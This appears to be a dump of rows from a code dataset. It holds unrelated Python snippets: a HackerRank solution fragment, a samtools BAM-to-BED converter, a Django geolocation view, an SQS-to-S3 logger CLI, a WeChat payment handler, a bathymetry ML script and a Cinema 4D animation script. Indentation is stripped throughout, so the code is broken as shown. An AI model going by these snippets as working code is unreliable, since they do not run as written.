print(sam_apples)
print(sam_oranges)
# the below variable names are given by hackerrank which is not my naming style
if __name__ == '__main__':
st = input().split()
s = int(st[0])
t = int(st[1])
ab = input().split()
a = int(ab[0])
b = int(ab[1])
mn = input().split()
m = int(mn[0])
n = int(mn[1])
apples = list(map(int, input().rstrip().split()))
oranges = list(map(int, input().rstrip().split()))
countApplesAndOranges(s, t, a, b, apples, oranges)
|
993,494 | bdbb1abd3d2f6ced4c18c87f5b1be227be3d5a8f | """Convert :term:`BAM` format to :term:`BED` formats"""
from biokit.converters.convbase import ConvBase
__all__ = ["Bam2Bed"]
class Bam2Bed(ConvBase):
"""Convert sorted :term:`BAM` file into :term:`BED` file
::
samtools depth -aa INPUT > OUTPUT
"""
def __init__(self, infile, outfile, *args, **kargs):
""".. rubric:: constructor
:param str infile: input BAM file. **It must be sorted**.
:param str outfile: input BED file
"""
super(Bam2Bed, self).__init__(infile, outfile, *args, **kargs)
def convert(self):
cmd = "samtools depth -aa {} > {}".format(self.infile, self.outfile)
self.execute(cmd)
|
993,495 | 149ab6b0b6cae924992b32e6d93399ed66e9455b | from __future__ import absolute_import
from django.shortcuts import render
from django.http import HttpResponse,JsonResponse
from django.views.decorators.csrf import csrf_exempt
from Backoffice.models import Session_utilisateur, Commercial, Magasinvdsa, Admin
import json
import Dashboard
from Dashboard import views as query_view
def geolocalisation(request):
# ---> n-uplet de triplet de chaines, l'id, le nom et le prénom de tous les commercants
representants=query_view.sql_list_com();
# ---> n-uplet de couple, l'id et le nom de tous les magasins
magasins= query_view.sql_list_mag();
# ---> n-uplet de couple, l'id et le nom de toutes les familles
familles = query_view.sql_list_fam();
email_s = Session_utilisateur.objects.all().last().email_s
statut = Session_utilisateur.objects.all().last().statut_s
if statut == "commercial":
id = Commercial.objects.get(email = email_s).id
nom = Commercial.objects.get(email = email_s).nom
prenom = Commercial.objects.get(email = email_s).prenom
elif statut == "directeur":
id = Magasinvdsa.objects.get(email_directeur = email_s).id
nom = Magasinvdsa.objects.get(email = email_s).nom_directeur
prenom = Magasinvdsa.objects.get(email = email_s).prenom_directeur
elif statut == "administrateur":
id = Admin.objects.get(email = email_s).id
nom = Admin.objects.get(email = email_s).nom
prenom = Admin.objects.get(email = email_s).prenom
return render(request,"Geolocalisation/geolocalisation.html",{
"representants" : representants,
"magasins": magasins,
"familles" : familles,
"id": id,
"statut": statut,
"email_s":email_s,
"nom":nom,
"prenom":prenom
})
# ---> n-uplet de couple, l'id et le nom des sous-familles en fonction de l'id famille 'id_fam' dans la requete ajax GET 'request'
@csrf_exempt
def sql_list_sous_fam(request):
# i faut lever l'exceptin ValueError dans le cas ou la valeur vaut "null" quand il selectionne toutes les famille
id_famille = int(request.POST['fid_fam'])
print("id famille envoyer par django:",id_famille)
jsonResponse = query_view.sql_list_sous_fam(request)
return jsonResponse
|
993,496 | c70000071ebb05e92516a7f948e10c4f9d08964e | #!/usr/bin/env python
import argparse
from sqs_s3_logger.environment import Environment
from sqs_s3_logger.lambda_function_builder import build_package, ROLE_NAME, ROLE_POLICY
def get_environment(args):
f_name = args.function if args.function is not None else\
'{}-to-{}'.format(args.queue, args.bucket)
return Environment(
queue_name=args.queue,
bucket_name=args.bucket,
function_name=f_name
)
def create(args):
env = get_environment(args)
package_file = build_package()
role_arn = env.update_role_policy(ROLE_NAME, ROLE_POLICY)
env.update_function(role_arn, package_file, schedule=args.schedule)
def purge(args):
env = get_environment(args)
env.destroy(delete_function=True)
def main():
parser = argparse.ArgumentParser()
parser.add_argument('command', nargs='?', default='create',
help='create(default) / purge'),
parser.add_argument('-b', '--bucket', required=True,
help='Name of the bucket to drop logs to')
parser.add_argument('-q', '--queue', required=True,
help='Name of the queue to be used')
parser.add_argument('-f', '--function',
help='Name of the read/push function - will be replaced if exists')
parser.add_argument('-s', '--schedule', default='rate(1 day)',
help='A cron/rate at which the function will execute.')
args = parser.parse_args()
if args.command == 'create':
create(args)
elif args.command == 'purge':
purge(args)
if __name__ == '__main__':
main()
|
993,497 | 92d121e956e69ce3cea995773f6f4208f734dd56 | # -*- coding: utf-8 -*-
import time
import tornado.web
import tornado.gen
import tornado.httpclient
import url
from util import dtools, security, httputils
from handler.site_base import SiteBaseHandler
class OrderHandler(SiteBaseHandler):
@tornado.gen.coroutine
def post(self, siteid):
parse_args = self.assign_arguments(
essential=['appid',
'title',
'out_trade_no',
'total_fee',
'spbill_create_ip',
'trade_type'],
extra=[('detail', ''),
('unionid', ''),
('openid', '')]
)
if not parse_args.get('unionid') and not parse_args.get('openid'):
raise tornado.web.HTTPError(400)
req_data = dtools.transfer(
parse_args,
copys=['appid',
'out_trade_no',
'detail',
'total_fee',
'spbill_create_ip',
'trade_type',
'openid'],
renames=[('title', 'body')]
)
if not req_data.get('openid'):
req_data['openid'] = self.storage.get_user_info(appid=parse_args['appid'],
unionid=parse_args['unionid'],
select_key='openid')
appinfo = self.storage.get_app_info(appid=req_data['appid'])
if not appinfo:
self.send_response(err_code=3201)
raise tornado.gen.Return()
req_data.update(
{
'attach': 'siteid=' + siteid,
'mch_id': appinfo.get('mch_id'),
'notify_url': self.storage.get_site_info(siteid, select_key='pay_notify_url')
}
)
req_key = appinfo['apikey']
security.add_sign(req_data, req_key)
try:
resp = yield httputils.post_dict(url=url.mch_order_add, data=req_data, data_type='xml')
except tornado.httpclient.HTTPError:
self.send_response(err_code=1001)
raise tornado.gen.Return()
resp_data = self.parse_payment_resp(resp, req_key)
if resp_data:
real_sign_data = {
'appId': resp_data['appid'],
'timeStamp': str(int(time.time())),
'nonceStr': security.nonce_str(),
'package': 'prepay_id=' + resp_data['prepay_id'],
'signType': 'MD5'
}
post_resp_data = {
'appid': real_sign_data['appId'],
'timestamp': real_sign_data['timeStamp'],
'noncestr': real_sign_data['nonceStr'],
'prepay_id': resp_data['prepay_id'],
'sign_type': real_sign_data['signType'],
'pay_sign': security.build_sign(real_sign_data, req_key)
}
self.send_response(post_resp_data)
@tornado.gen.coroutine
def get(self, siteid, out_trade_no):
appid = self.get_argument('appid')
appinfo = self.storage.get_app_info(appid=appid)
if not appinfo:
self.send_response(err_code=3201)
raise tornado.gen.Return()
req_data = {
'appid': appid,
'mch_id': appinfo.get('mch_id'),
'transaction_id': '',
'out_trade_no': out_trade_no
}
req_key = appinfo['apikey']
security.add_sign(req_data, req_key)
try:
resp = yield httputils.post_dict(url=url.mch_order_query, data=req_data, data_type='xml')
except tornado.httpclient.HTTPError:
self.send_response(err_code=1001)
raise tornado.gen.Return()
resp_data = self.parse_payment_resp(resp, req_key)
if resp_data:
post_resp_data = dtools.transfer(
resp_data,
copys=[
'appid',
'openid',
'trade_state',
'out_trade_no',
'total_fee',
'transaction_id',
'time_end'
]
)
self.send_response(post_resp_data)
|
993,498 | 74a370248526ad8c934836925fad344ddd72c216 | import os, math, numpy as np
import matplotlib.pyplot as plt
from sklearn.cluster import DBSCAN, KMeans
from sklearn.decomposition import PCA
from sklearn import preprocessing
from bathyml.common.training import getParameterizedModel
from mpl_toolkits.mplot3d import Axes3D
def read_csv_data( fileName: str, nBands: int = 0 ) -> np.ndarray:
file_path: str = os.path.join( ddir, "csv", fileName )
raw_data_array: np.ndarray = np.loadtxt( file_path, delimiter=',')
if (nBands > 0): raw_data_array = raw_data_array[:,:nBands]
return raw_data_array
def compute_cluster_centroids(clusters: np.ndarray, data: np.ndarray) -> np.ndarray:
clusterDict = {}
for iP in range( data.shape[0]):
iC = clusters[iP]
cluster = clusterDict.setdefault( iC, [] )
cluster.append( data[iP] )
centroids = []
for cluster in clusterDict.values():
csum = sum( cluster )
cmean = csum/len( cluster )
centroids.append( cmean )
return np.stack( centroids, axis=0 )
thisDir = os.path.dirname(os.path.abspath(__file__))
ddir = os.path.join(os.path.dirname(os.path.dirname(thisDir)), "data", "csv")
nBands = 21
whiten = False
typeLabel = "train"
validation_fraction = 0.2
clusterIndex = 1
modelType = "mlp"
datafile = os.path.join(ddir, f'lake_data_{typeLabel}.csv' )
dataArray: np.ndarray = np.loadtxt( datafile, delimiter=",")
xyData = dataArray[:,0:2]
db = DBSCAN(eps=600.0, min_samples=8).fit(xyData)
clusters: np.ndarray = db.labels_
cmaxval = clusters.max()
ccolors = (db.labels_ + 1.0) * (255.0 / cmaxval)
loc0: np.ndarray = dataArray[:,0]
loc1: np.ndarray = dataArray[:,1]
zd: np.ndarray = dataArray[:,2]
colorData = dataArray[:,3:nBands+3]
cnorm = preprocessing.scale( colorData )
pca = PCA(n_components=3, whiten=whiten)
color_point_data_pca = pca.fit(colorData).transform(colorData)
cx = color_point_data_pca[:, 0]
cy = color_point_data_pca[:, 1]
cdx, cdy = ( cx + 674.253 )/300.0, ( cy + 321.075 )/300.0
mask0 = (cdx*cdx + cdy*cdy) < 1.0
mask = mask0 if clusterIndex == 0 else mask0 == False
xdata = cnorm[ mask ]
ydata = zd[ mask ]
NValidationElems = int(round(xdata.shape[0] * validation_fraction))
NTrainingElems = xdata.shape[0] - NValidationElems
model_label = "-".join([modelType, str(clusterIndex), str(validation_fraction)])
x_train = xdata[:NTrainingElems]
x_test = xdata[NTrainingElems:]
y_train = ydata[:NTrainingElems]
y_test = ydata[NTrainingElems:]
model = getParameterizedModel( modelType )
model.fit(x_train, y_train)
prediction_training = model.predict(x_train)
prediction_validation = model.predict(x_test)
diff = prediction_validation - y_test
validation_loss = math.sqrt((diff * diff).mean())
print(f" --> loss={validation_loss}")
diff = y_train - prediction_training
mse = math.sqrt((diff * diff).mean())
ax0 = plt.subplot("211")
ax0.set_title(f"{model_label} Training Data MSE = {mse:.2f} ")
xaxis = range(prediction_training.shape[0])
ax0.plot(xaxis, y_train, "b--", label="validation data")
ax0.plot(xaxis, prediction_training, "r--", label="prediction")
ax0.legend()
plt.show()
diff = y_test - prediction_validation
ref_mse = math.sqrt((y_test * y_test).mean())
mse = math.sqrt((diff * diff).mean())
print(f" REF MSE = {ref_mse} ")
ax1 = plt.subplot("212")
ax1.set_title(f"{model_label} Validation Data MSE = {mse:.2f} ")
xaxis = range(prediction_validation.shape[0])
ax1.plot(xaxis, y_test, "b--", label="training data")
ax1.plot(xaxis,prediction_validation, "r--", label="prediction")
ax1.legend()
plt.show()
|
993,499 | d1c0eab6bd5890577fa6bcd4219c0d32a0e182a1 | """Name-en-US: Animate on Spline
Description-en-US: Creates an Align To Spline tag with keys at the start/end of animation.
Written for CINEMA 4D R14.025
LICENSE:
Copyright (C) 2012 by Donovan Keith (www.donovankeith.com)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE
INSTRUCTIONS:
1. Select the object(s) you want to animate along a spline
2. Continue selecting, select the spline you want to animate onto last.
3. Run the "Animate on Spline" command.
WHAT HAPPENED:
You now have an align to spline tag with keys on the first and last frames
it is pointing to the spline you selected last, or to nothing if
you did not select a spline last.
TO DO:
Add support for auto-assign-to-spline even if spline
isn't the last object in a list of objects.
CHANGELOG:
v0.01: Created basic functionality.
-
Name-US: Animate on Spline
Description-US: Takes the selected objects, and adds an Align To Spline tag with keyframes.
"""
import c4d
def main():
doc.StartUndo()
# Loop through all active objects
# Get the active objects in order
objs = doc.GetActiveObjects(flags=c4d.GETACTIVEOBJECTFLAGS_SELECTIONORDER)
# If there aren't any objects, return
if len(objs) == 0:
return
# The spline is the last object in the list.
spline = None
# If there's more than one object selected, the last can be
# a spline
if len(objs) > 1:
# Test to see if it's a spline
if objs[-1].GetRealSpline():
# If it is, amend the object list
spline = objs.pop()
# If the user only selected two objects, don't worry about order.
elif (len(objs) == 2) and objs[0].GetRealSpline:
objs.reverse()
spline = objs.pop()
# If you've found a spline...
if spline is not None:
# Adjust interpolation to Uniform
doc.AddUndo(c4d.UNDOTYPE_CHANGE_SMALL, spline)
spline[c4d.SPLINEOBJECT_INTERPOLATION] = 2
# Preload Start/End Times
start_time = doc.GetMinTime()
end_time = doc.GetMaxTime()
# Keep track of whether any tags are already selected
selected = False
# For every selected object
for obj in objs:
# Add an Align to Spline Tag
tag = c4d.BaseTag(c4d.Taligntospline)
if spline is not None:
tag[c4d.ALIGNTOSPLINETAG_LINK] = spline
obj.InsertTag(tag)
# Create a track
track = c4d.CTrack(tag, c4d.DescID(c4d.DescLevel(
c4d.ALIGNTOSPLINETAG_POSITION, c4d.DTYPE_REAL, 0)))
tag.InsertTrackSorted(track)
curve = track.GetCurve()
# Create a Key at frame 0
start_key = c4d.CKey()
start_key.SetTime(curve, start_time)
start_key.SetValue(curve, 0.0)
curve.InsertKey(start_key)
# Create a Key at last frame
end_key = c4d.CKey()
end_key.SetTime(curve, end_time)
end_key.SetValue(curve, 1.0)
curve.InsertKey(end_key)
# Set default key interpolation.
curve.SetKeyDefault(doc, 0) # Key 0: Start Key
curve.SetKeyDefault(doc, 1) # Key 1: End Key
# Select the new tags
if not selected:
doc.SetActiveTag(tag, c4d.SELECTION_NEW)
selected = True
else:
doc.SetActiveTag(tag, c4d.SELECTION_ADD)
doc.AddUndo(c4d.UNDOTYPE_NEW, tag)
doc.EndUndo()
c4d.EventAdd()
if __name__ == '__main__':
main()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.